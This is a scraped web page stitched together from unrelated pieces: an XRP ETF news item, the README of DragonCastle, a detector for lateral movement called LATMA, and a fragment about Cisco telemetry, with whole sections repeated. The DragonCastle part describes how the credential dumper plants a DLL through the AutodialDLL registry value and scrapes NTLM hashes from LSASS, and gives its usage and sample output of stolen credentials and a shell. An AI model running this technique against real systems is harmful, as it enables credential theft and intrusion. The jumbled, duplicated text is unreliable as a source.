XRP ETFs are on the verge of hitting a significant milestone, with total Assets Under Management (AUM) approaching the $1 billion milestone. Since the launch of its ETF last month, hundreds of millions of dollars have been flowing in daily, making XRP the most successful new ETF entrant of 2025.Β
XRP ETFs Close In On $1 Billion
XRP ETFs have continued to experience skyrocketing growth and institutional demand, now rapidly closing in on the $1 billion inflow milestone. Over the past two weeks, all five XRP ETFs have recorded over $984.54 million in cumulative net inflows, just $15.46 million away from $1 billion. This explosive, accelerated growth has effectively solidified XRPβs position as the third-largest crypto ETF, behind Bitcoin and Ethereum.
Data from Sosovalue reports 15 consecutive days of positive flow, with the XRP ETF recording its highest single-day inflow on November 14 at $243.05 million. Over the last two weeks, all five XRP ETFs, including REX-Osprey, have seen notable inflows, reflecting growing institutional interest and demand.Β
According to crypto enthusiast @NADZOE93 on X, XRP has become the third cryptocurrency ever to surpass the $800 million ETF inflow threshold. She noted that while Spot Bitcoin ETFs reached this cap in just two days after their launch, Ethereum ETFs took 95 days. This officially positions XRP as the second-fastest crypto to hit the $800 million inflow mark.Β
Notably, strong inflows in the XRP ETF began on November 13 with the launch of Canary Capitals XRPC. A week later, Bitwise introduced its own XRP ETF, followed shortly by Grayscale and Franklin Templeton debuting their funds. Since then, investments have continued to pour in, with $26.17 million flowing in just yesterday alone, bringing the total to $887.12 million after 15 days of positive flow.Β
Crypto market analyst Neil Tolbert shared additional insights on the XRP ETF performance on X this week. He noted that five spot XRP ETFs are currently trading, with a combined $995 million in Assets Under Management. Canary Capitalβs XRPC stands at the top of the market with $358.88 million, followed by Grayscaleβs GXRP with $211.07 million, Bitwiseβs ETF at $184.87 million, Franklin Templetonβs XRPZ at $132.3 million, and REX-Osprey at $108 million.Β
Tolbert has stated that more ETFs are reportedly in the pipeline, with institutional demand set to grow as traditional finance takes notice of XRP. With the race to a $1 billion inflow milestone heating up, XRP ETFs have already surpassed those of Solana and Dogecoin.Β
Institutions Accumulate Over 400 Million XRP Through ETFs
Institutional demand for XRP is reaching new heights as data from ETF tracker XRP Insights show that a whopping 425.76 million tokens have been officially locked. This surge in accumulation comes as the five currently launched XRP ETFs collectively reach $984.54 million in AUM.
This large amount of XRP held in ETFs shows how quickly institutions are adopting, as investors increasingly seek regulated, transparent ways to gain exposure to cryptocurrencies. Analysts have also warned that if ETFs continue to absorb XRP at such a rapid pace, it could trigger a supply shock as the number of tokens in circulation declines.
A PoC that combines AutodialDLL lateral movement technique and SSP to scrape NTLM hashes from LSASS process.
Description
Upload a DLL to the target machine. Then it enables remote registry to modify AutodialDLL entry and start/restart BITS service. Svchosts would load our DLL, set again AutodiaDLL to default value and perform a RPC request to force LSASS to load the same DLL as a Security Support Provider. Once the DLL is loaded by LSASS, it would search inside the process memory to extract NTLM hashes and the key/IV.
The DLLMain always returns False so the processes doesn't keep it.
Caveats
It only works when RunAsPPL is not enabled. Also I only added support to decrypt 3DES because I am lazy, but should be easy peasy to add code for AES. By the same reason, I only implemented support for next Windows versions:
Build
Support
Windows 10 version 21H2
Windows 10 version 21H1
Implemented
Windows 10 version 20H2
Implemented
Windows 10 version 20H1 (2004)
Implemented
Windows 10 version 1909
Implemented
Windows 10 version 1903
Implemented
Windows 10 version 1809
Implemented
Windows 10 version 1803
Implemented
Windows 10 version 1709
Implemented
Windows 10 version 1703
Implemented
Windows 10 version 1607
Implemented
Windows 10 version 1511
Windows 10 version 1507
Windows 8
Windows 7
The signatures/offsets/structs were taken from Mimikatz. If you want to add a new version just check sekurlsa functionality on Mimikatz.
Usage
credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line -dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter -target-ip ip address IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it -local-dll dll to plant DLL location (local) that will be planted on target -remote-dll dll location Path used to update AutodialDLL registry value" dir="auto">
usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]
DragonCastle - A credential dumper (@TheXC3LL)
optional arguments: -h, --help show this help message and exit -u USERNAME, --username USERNAME valid username -p PASSWORD, --password PASSWORD valid password (if omitted, it will be asked unless -no-pass) -d DOMAIN, --domain DOMAIN valid doma in name -hashes [LMHASH]:NTHASH NT/LM hashes (LM hash can be empty) -no-pass don't ask for password (useful for -k) -k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line -dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter -target-ip ip address IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it -local-dll dll to plant DLL location (local) that will be planted on target -remote-dll dll location Path used to update AutodialDLL registry value</ pre>
Example
Windows server on 192.168.56.20 and Domain Controller on 192.168.56.10:
[+] Connecting to 192.168.56.20 [+] Uploading DragonCastle.dll to c:\dump.dll [+] Checking Remote Registry service status... [+] Service is down! [+] Starting Remote Registry service... [+] Connecting to 192.168.56.20 [+] Updating AutodialDLL value [+] Stopping Remote Registry Service [+] Checking BITS service status... [+] Service is down! [+] Starting BITS service [+] Downloading creds [+] Deleting credential file [+] Parsing creds:
[*] SMBv3.0 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\>whoami sevenkingdoms\eddard.stark
C:\>whoami /priv
PRIVILEGES INFORMATION ----------------------
Privilege Name Description State ========================================= ================================================================== ======= SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled SeMachineAccountPrivilege Add workstations to domain Enabled SeSecurityPrivilege Manage auditing and security log Enabled SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled SeLoadDriverPrivilege Load and unload device drivers Enabled SeSystemProfilePrivilege Profile system performance Enabled SeSystemtimePrivilege Change the system time Enabled SeProfileSingleProcessPrivilege Profile single process Enabled SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled SeCreatePagefilePrivilege Create a pagefile Enabled SeBackupPrivile ge Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeDebugPrivilege Debug programs Enabled SeSystemEnvironmentPrivilege Modify firmware environment values Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled SeUndockPrivilege Remove computer from docking station Enabled SeEnableDelegationPrivilege En able computer and user accounts to be trusted for delegation Enabled SeManageVolumePrivilege Perform volume maintenance tasks Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled SeTimeZonePrivilege Change the time zone Enabled SeCreateSymbolicLinkPrivilege Create symbolic links Enabled SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
Lateral movement analyzer (LATMA) collects authentication logs from the domain and searches for potential lateral movement attacks and suspicious activity. The tool visualizes the findings with diagrams depicting the lateral movement patterns. This tool contains two modules, one that collects the logs and one that analyzes them. You can execute each of the modules separately, the event log collector should be executed in a Windows machine in an active directory domain environment with python 3.8 or above. The analyzer can be executed in a linux machine and a Windows machine.
The Collector
The Event Log Collector module scans domain controllers for successful NTLM authentication logs and endpoints for successful Kerberos authentication logs. It requires LDAP/S port 389 and 636 and RPC port 135 access to the domain controller and clients. In addition it requires domain admin privileges or a user in the Event log Reader group or one with equivalent permissions. This is required to pull event logs from all endpoints and domain controllers.
The collector gathers NTLM logs from event 8004 on the domain controllers and Kerberos logs from event 4648 on the clients. It generates as an output a csv comma delimited format file with all the available authentication traffic. The output contains the fields source host, destination, username, auth type, SPN and timestamps in the format %Y/%m/%d %H:%M. The collector requires credential of a valid user with event viewer privileges across the environment and queries the specific logs for each protocol.
Verify Kerberos and NTLM protocols are audited across the environment using group policy:
NTLM - Computer Configuration -> Policies -> Windows Settings -> Security Settings -> Local Policies -> Security Options -> Network Security: Restrict NTLM: audit NTLM authentication in this domain
The Analyzer
The Analyzer receives as input a spreadsheet with authentication data formatted as specified in Collector's output structure. It searches for suspicious activity with the lateral movement analyzer algorithm and also detects additional IoCs of lateral movement. The authentication source and destination should be formalized with netbios name and not ip addresses.
Preliminaries and key concepts of the LATMA algorithm
LATMA gets a batch of authentication requests and sends an alert when it finds suspicious lateral movement attacks. We define the following:
Authentication Graph: A directed graph that contains information about authentication traffic in the environment. The nodes of the graphs are computers, and the edges are authentications between the computers. The graph edges have the attributes: protocol type, date of authentication and the account that sent the request. The graph nodes contain information about the computer it represents, detailed below.
Lateral movement graph: A sub-graph of the authentication graph that represents the attackerβs movement. The lateral movement graph is not always a path in the sub-graph, in some attacks the attacker goes in many different directions.
Alert: A sub-graph the algorithm suspects are part of the lateral movement graph.
LATMA performs several actions during its execution:
Information gathering: LATMA monitors normal behavior of the users and machines and characterizes them. The learning is used later to decide which authentication requests deviate from a normal behavior and might be involved in a lateral movement attack. For a learning period of three weeks LATMA does not throw any alerts and only learns the environment. The learning continues after those three weeks.
Authentication graph building: After the learning period every relevant authentication is added to the authentication graph. It is critical to filter only for relevant authentication, otherwise the number of edges the graph holds might be too big. We filter on the following protocol types: NTLM and Kerberos with the services βrpcβ, βrpcssβ and βtermsrv.β
Alert handling:
Adding an authentication to the graph might trigger a process of alerting. In general, a new edge can create a new alert, join an existing alert or merge two alerts.
Information gathering
Every authentication request monitored by LATMA is used for learning and stored in a dedicated data structure. First, we identify sinks and hubs. We define sinks as machines accessed by many (at least 50) different accounts, such as a company portal or exchange server. We define hubs as machines many different accounts (at least 20) authenticate from, such as proxies and VPNs. Authentications to sinks or from hubs are considered benign and are therefore removed from the authentication graph.
In addition to basic classification, LATMA matches between accounts and machines they frequently authenticate from. If an account authenticates from a machine at least three different days in a three weeksβ period, it means that this account matches the machine and any authentication of this account from the machine is considered benign and removed from the authentication graph.
The lateral movement IoCs are:
Whiteβ― cane β―- User accounts authenticating from a single machine to multiple ones in a relatively short time.
Bridge - User account X authenticating from machine A to machine B and following that, from machine B to machine C. This IoC potentially indicates an attacker performing actual advance from its initial foothold (A) to destination machine that better serves the attackβs objectives.
Switched Bridge - User account X authenticating from machine A to machine B, followed by user account Y authenticating from machine B to machine C. This IoC potentially indicates an attacker that discovers and compromises an additional account along its path and uses the new account to advance forward (a common example is account X being a standard domain user and account Y being a admin user)
Weight Shift - White cane (see above) from machine A to machines {B1,β¦, Bn}, followed by another White cane from machine Bx to machines {C1,β¦,Cn}. This IoC potentially indicates an attacker that has determined that machine B would better serve the attackβs purposes from now on uses machine B as the source for additional searches.
Blast - User account X authenticating from machine A to multiple machines in a very short timeframe. A common example is an attacker that plants \ executes ransomware on a mass number of machines simultaneously
Output:
The analyzer outputs several different files
A spreadsheet with all the suspected authentications (all_authentications.csv) and their role classification and a different spreadsheet for the authentications that are suspected to be part of lateral movement (propagation.csv)
A GIF file represents the progression, wherby each frame of the GIF specifies exactly what was the suspicious action
An interactive timeline with all the suspicious events. Events that are related to each other have the same color
Dependencies:
Python 3.8
libraries as follows in requirements.txt
Run pip install . for running setup automatically
Audit Kerberos and NTLM across the environment
LDAP queries to the domain controllers
Domain admin credentials or any credentials with MS-EVEN6 remote event viewer permissions.
usage
The Collector
Required arguments:
credentials [domain.com/]username[:password] credentials format alternatively [domain.com/]username and then password will be prompted securely. For domain please insert the FQDN (Fully Quallified Domain Name). Optional arguments:
-ntlm Retrieve ntlm authentication logs from DC
-kerberos Retrieve kerberos authentication logs from all computers in the domain
-debug Turn DEBUG output ON
-help show this help message and exit
-filter Query specific ou or container in the domain, will result all workstations in the sub-OU as well. Each OU will be in format of DN (Distinguished Name). Supports multiple OUs with a semicolon delimiter. Example: OU=subunit,OU=unit;OU=anotherUnit,DC=domain,DC=com Example: CN=container,OU=unit;OU=anotherUnit,DC=domain,DC=com
-date Starting date to collect event logs from. month-day-year format, if not specified take all available data
-threads amount of working threads to use
-ldap Use Unsecure LDAP instead of LDAP/S
-ldap_domain Custom domain on ldap login credentials. If empty, will use current user's session domain
The Analyzer
Required arguments:
authentication_file authentication file should contain list of NTLM and Kerberos requests
Optional arguments: 2. -output_file The location the csv with the all the IOCs is going to be saved to 3. -progression_output_file The location the csv with the the IOCs of the lateral movements is going to be save to 4. -sink_threshold number of accounts from which a machine is considered sink, default is 50 5. -hub_threshold number of accounts from which a machine is considered hub, default is 20 6. -learning_period learning period in days, default is 7 days 7. -show_all_iocs Show IoC that are not connected to any other IoCs 8. -show_gant If true, output the events in a gant format
Binary Usage Open command prompt and navigate to the binary folder. Run executables with the specified above arguments.
Examples
In the example files you have several samples of real environments (some contain lateral movement attacks and some don't) which you can give as input for the analyzer.
In this article, we will be talking about setting up a basic Lab for testing Telemetry on a Cisco NC55XX router. Telemetry β βTeleβ means remote, βmetryβ means metrics or measurements, together this word simply
A PoC that combines AutodialDLL lateral movement technique and SSP to scrape NTLM hashes from LSASS process.
Description
Upload a DLL to the target machine. Then it enables remote registry to modify AutodialDLL entry and start/restart BITS service. Svchosts would load our DLL, set again AutodiaDLL to default value and perform a RPC request to force LSASS to load the same DLL as a Security Support Provider. Once the DLL is loaded by LSASS, it would search inside the process memory to extract NTLM hashes and the key/IV.
The DLLMain always returns False so the processes doesn't keep it.
Caveats
It only works when RunAsPPL is not enabled. Also I only added support to decrypt 3DES because I am lazy, but should be easy peasy to add code for AES. By the same reason, I only implemented support for next Windows versions:
Build
Support
Windows 10 version 21H2
Windows 10 version 21H1
Implemented
Windows 10 version 20H2
Implemented
Windows 10 version 20H1 (2004)
Implemented
Windows 10 version 1909
Implemented
Windows 10 version 1903
Implemented
Windows 10 version 1809
Implemented
Windows 10 version 1803
Implemented
Windows 10 version 1709
Implemented
Windows 10 version 1703
Implemented
Windows 10 version 1607
Implemented
Windows 10 version 1511
Windows 10 version 1507
Windows 8
Windows 7
The signatures/offsets/structs were taken from Mimikatz. If you want to add a new version just check sekurlsa functionality on Mimikatz.
Usage
credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line -dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter -target-ip ip address IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it -local-dll dll to plant DLL location (local) that will be planted on target -remote-dll dll location Path used to update AutodialDLL registry value" dir="auto">
usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]
DragonCastle - A credential dumper (@TheXC3LL)
optional arguments: -h, --help show this help message and exit -u USERNAME, --username USERNAME valid username -p PASSWORD, --password PASSWORD valid password (if omitted, it will be asked unless -no-pass) -d DOMAIN, --domain DOMAIN valid doma in name -hashes [LMHASH]:NTHASH NT/LM hashes (LM hash can be empty) -no-pass don't ask for password (useful for -k) -k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line -dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter -target-ip ip address IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it -local-dll dll to plant DLL location (local) that will be planted on target -remote-dll dll location Path used to update AutodialDLL registry value</ pre>
Example
Windows server on 192.168.56.20 and Domain Controller on 192.168.56.10:
[+] Connecting to 192.168.56.20 [+] Uploading DragonCastle.dll to c:\dump.dll [+] Checking Remote Registry service status... [+] Service is down! [+] Starting Remote Registry service... [+] Connecting to 192.168.56.20 [+] Updating AutodialDLL value [+] Stopping Remote Registry Service [+] Checking BITS service status... [+] Service is down! [+] Starting BITS service [+] Downloading creds [+] Deleting credential file [+] Parsing creds:
[*] SMBv3.0 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\>whoami sevenkingdoms\eddard.stark
C:\>whoami /priv
PRIVILEGES INFORMATION ----------------------
Privilege Name Description State ========================================= ================================================================== ======= SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled SeMachineAccountPrivilege Add workstations to domain Enabled SeSecurityPrivilege Manage auditing and security log Enabled SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled SeLoadDriverPrivilege Load and unload device drivers Enabled SeSystemProfilePrivilege Profile system performance Enabled SeSystemtimePrivilege Change the system time Enabled SeProfileSingleProcessPrivilege Profile single process Enabled SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled SeCreatePagefilePrivilege Create a pagefile Enabled SeBackupPrivile ge Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeDebugPrivilege Debug programs Enabled SeSystemEnvironmentPrivilege Modify firmware environment values Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled SeUndockPrivilege Remove computer from docking station Enabled SeEnableDelegationPrivilege En able computer and user accounts to be trusted for delegation Enabled SeManageVolumePrivilege Perform volume maintenance tasks Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled SeTimeZonePrivilege Change the time zone Enabled SeCreateSymbolicLinkPrivilege Create symbolic links Enabled SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
Lateral movement analyzer (LATMA) collects authentication logs from the domain and searches for potential lateral movement attacks and suspicious activity. The tool visualizes the findings with diagrams depicting the lateral movement patterns. This tool contains two modules, one that collects the logs and one that analyzes them. You can execute each of the modules separately, the event log collector should be executed in a Windows machine in an active directory domain environment with python 3.8 or above. The analyzer can be executed in a linux machine and a Windows machine.
The Collector
The Event Log Collector module scans domain controllers for successful NTLM authentication logs and endpoints for successful Kerberos authentication logs. It requires LDAP/S port 389 and 636 and RPC port 135 access to the domain controller and clients. In addition it requires domain admin privileges or a user in the Event log Reader group or one with equivalent permissions. This is required to pull event logs from all endpoints and domain controllers.
The collector gathers NTLM logs from event 8004 on the domain controllers and Kerberos logs from event 4648 on the clients. It generates as an output a csv comma delimited format file with all the available authentication traffic. The output contains the fields source host, destination, username, auth type, SPN and timestamps in the format %Y/%m/%d %H:%M. The collector requires credential of a valid user with event viewer privileges across the environment and queries the specific logs for each protocol.
Verify Kerberos and NTLM protocols are audited across the environment using group policy:
NTLM - Computer Configuration -> Policies -> Windows Settings -> Security Settings -> Local Policies -> Security Options -> Network Security: Restrict NTLM: audit NTLM authentication in this domain
The Analyzer
The Analyzer receives as input a spreadsheet with authentication data formatted as specified in Collector's output structure. It searches for suspicious activity with the lateral movement analyzer algorithm and also detects additional IoCs of lateral movement. The authentication source and destination should be formalized with netbios name and not ip addresses.
Preliminaries and key concepts of the LATMA algorithm
LATMA gets a batch of authentication requests and sends an alert when it finds suspicious lateral movement attacks. We define the following:
Authentication Graph: A directed graph that contains information about authentication traffic in the environment. The nodes of the graphs are computers, and the edges are authentications between the computers. The graph edges have the attributes: protocol type, date of authentication and the account that sent the request. The graph nodes contain information about the computer it represents, detailed below.
Lateral movement graph: A sub-graph of the authentication graph that represents the attackerβs movement. The lateral movement graph is not always a path in the sub-graph, in some attacks the attacker goes in many different directions.
Alert: A sub-graph the algorithm suspects are part of the lateral movement graph.
LATMA performs several actions during its execution:
Information gathering: LATMA monitors normal behavior of the users and machines and characterizes them. The learning is used later to decide which authentication requests deviate from a normal behavior and might be involved in a lateral movement attack. For a learning period of three weeks LATMA does not throw any alerts and only learns the environment. The learning continues after those three weeks.
Authentication graph building: After the learning period every relevant authentication is added to the authentication graph. It is critical to filter only for relevant authentication, otherwise the number of edges the graph holds might be too big. We filter on the following protocol types: NTLM and Kerberos with the services βrpcβ, βrpcssβ and βtermsrv.β
Alert handling:
Adding an authentication to the graph might trigger a process of alerting. In general, a new edge can create a new alert, join an existing alert or merge two alerts.
Information gathering
Every authentication request monitored by LATMA is used for learning and stored in a dedicated data structure. First, we identify sinks and hubs. We define sinks as machines accessed by many (at least 50) different accounts, such as a company portal or exchange server. We define hubs as machines many different accounts (at least 20) authenticate from, such as proxies and VPNs. Authentications to sinks or from hubs are considered benign and are therefore removed from the authentication graph.
In addition to basic classification, LATMA matches between accounts and machines they frequently authenticate from. If an account authenticates from a machine at least three different days in a three weeksβ period, it means that this account matches the machine and any authentication of this account from the machine is considered benign and removed from the authentication graph.
The lateral movement IoCs are:
Whiteβ― cane β―- User accounts authenticating from a single machine to multiple ones in a relatively short time.
Bridge - User account X authenticating from machine A to machine B and following that, from machine B to machine C. This IoC potentially indicates an attacker performing actual advance from its initial foothold (A) to destination machine that better serves the attackβs objectives.
Switched Bridge - User account X authenticating from machine A to machine B, followed by user account Y authenticating from machine B to machine C. This IoC potentially indicates an attacker that discovers and compromises an additional account along its path and uses the new account to advance forward (a common example is account X being a standard domain user and account Y being a admin user)
Weight Shift - White cane (see above) from machine A to machines {B1,β¦, Bn}, followed by another White cane from machine Bx to machines {C1,β¦,Cn}. This IoC potentially indicates an attacker that has determined that machine B would better serve the attackβs purposes from now on uses machine B as the source for additional searches.
Blast - User account X authenticating from machine A to multiple machines in a very short timeframe. A common example is an attacker that plants \ executes ransomware on a mass number of machines simultaneously
Output:
The analyzer outputs several different files
A spreadsheet with all the suspected authentications (all_authentications.csv) and their role classification and a different spreadsheet for the authentications that are suspected to be part of lateral movement (propagation.csv)
A GIF file represents the progression, wherby each frame of the GIF specifies exactly what was the suspicious action
An interactive timeline with all the suspicious events. Events that are related to each other have the same color
Dependencies:
Python 3.8
libraries as follows in requirements.txt
Run pip install . for running setup automatically
Audit Kerberos and NTLM across the environment
LDAP queries to the domain controllers
Domain admin credentials or any credentials with MS-EVEN6 remote event viewer permissions.
usage
The Collector
Required arguments:
credentials [domain.com/]username[:password] credentials format alternatively [domain.com/]username and then password will be prompted securely. For domain please insert the FQDN (Fully Quallified Domain Name). Optional arguments:
-ntlm Retrieve ntlm authentication logs from DC
-kerberos Retrieve kerberos authentication logs from all computers in the domain
-debug Turn DEBUG output ON
-help show this help message and exit
-filter Query specific ou or container in the domain, will result all workstations in the sub-OU as well. Each OU will be in format of DN (Distinguished Name). Supports multiple OUs with a semicolon delimiter. Example: OU=subunit,OU=unit;OU=anotherUnit,DC=domain,DC=com Example: CN=container,OU=unit;OU=anotherUnit,DC=domain,DC=com
-date Starting date to collect event logs from. month-day-year format, if not specified take all available data
-threads amount of working threads to use
-ldap Use Unsecure LDAP instead of LDAP/S
-ldap_domain Custom domain on ldap login credentials. If empty, will use current user's session domain
The Analyzer
Required arguments:
authentication_file authentication file should contain list of NTLM and Kerberos requests
Optional arguments: 2. -output_file The location the csv with the all the IOCs is going to be saved to 3. -progression_output_file The location the csv with the the IOCs of the lateral movements is going to be save to 4. -sink_threshold number of accounts from which a machine is considered sink, default is 50 5. -hub_threshold number of accounts from which a machine is considered hub, default is 20 6. -learning_period learning period in days, default is 7 days 7. -show_all_iocs Show IoC that are not connected to any other IoCs 8. -show_gant If true, output the events in a gant format
Binary Usage Open command prompt and navigate to the binary folder. Run executables with the specified above arguments.
Examples
In the example files you have several samples of real environments (some contain lateral movement attacks and some don't) which you can give as input for the analyzer.
Login
